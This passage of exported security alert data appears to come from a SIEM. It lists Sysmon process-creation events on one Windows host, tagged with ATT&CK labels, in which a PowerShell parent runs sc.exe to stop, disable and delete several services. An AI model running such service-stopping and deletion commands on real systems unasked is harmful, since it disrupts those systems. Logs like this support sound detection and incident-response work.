Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.683",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.425 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010b6321e00} +ProcessId: 5700 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WebServers +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WebServers",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.428809100Z"",""eventRecordID"":""2423"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.425\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010b6321e00}\r\nProcessId: 5700\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WebServers\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.425"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010b6321e00}"",""processId"":""5700"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WebServers"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.614",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.354 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010bb2f1e00} +ProcessId: 6072 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop taskmgr1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.356285400Z"",""eventRecordID"":""2420"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.354\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010bb2f1e00}\r\nProcessId: 6072\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.354"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010bb2f1e00}"",""processId"":""6072"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop taskmgr1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.577",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: 
+RuleName: +UtcTime: 2020-05-28 12:50:02.334 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010d42e1e00} +ProcessId: 7796 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config taskmgr1 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config taskmgr1 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.336820300Z"",""eventRecordID"":""2419"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.334\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010d42e1e00}\r\nProcessId: 7796\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating 
System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config taskmgr1 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.334"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010d42e1e00}"",""processId"":""7796"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config taskmgr1 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.527",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.295 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-00100c2d1e00} +ProcessId: 6100 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApServs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
wmiApServs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.297203900Z"",""eventRecordID"":""2417"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.295\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-00100c2d1e00}\r\nProcessId: 6100\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.295"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-00100c2d1e00}"",""processId"":""6100"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApServs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.480",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.232 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010512a1e00} +ProcessId: 6024 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApSrvs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 
+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.234225200Z"",""eventRecordID"":""2414"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.232\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010512a1e00}\r\nProcessId: 6024\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:02.232"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010512a1e00}"",""processId"":""6024"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApSrvs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.431",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.190 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-001081281e00} +ProcessId: 4216 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ALGM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete ALGM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.195546400Z"",""eventRecordID"":""2412"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.190\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-001081281e00}\r\nProcessId: 4216\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete ALGM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.190"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-001081281e00}"",""processId"":""4216"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete ALGM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.399",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.169 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-00108e271e00} +ProcessId: 5612 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 